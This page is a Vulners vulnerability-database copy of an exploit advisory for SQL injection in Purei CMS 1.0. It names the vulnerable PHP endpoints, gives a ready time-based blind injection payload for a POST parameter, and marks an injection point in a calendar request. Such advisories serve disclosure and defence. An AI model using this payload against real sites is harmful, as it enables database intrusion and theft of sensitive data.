Vulners
Lucene search
Purei CMS 1.0 - SQL Injection
# Exploit Title: Purei CMS 1.0 - SQL Injection
# Date: [27-03-2024]
# Exploit Author: [Number 7]
# Vendor Homepage: [purei.com]
# Version: [1.0]
# Tested on: [Linux]
____________________________________________________________________________________
Introduction:
An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation
of user input. Such an injection transpires when web applications accept user input directly inserted
into an SQL statement without effectively filtering out hazardous characters.
This could jeopardize the integrity of your database or reveal sensitive information.
____________________________________________________________________________________
Time-Based Blind SQL Injection:
Vulnerable files:
http://localhost/includes/getAllParks.php
http://localhost/includes/getSearchMap.php
make a POST request with the value of the am input set to :
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
make sure to url encode the inputs.
SQL injection:
Method: POST REQUEST
Vunerable file:
/includes/events-ajax.php?action=getMonth
data for the POST req:
month=3&type=&year=2024&cal_id=1[Inject Here]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4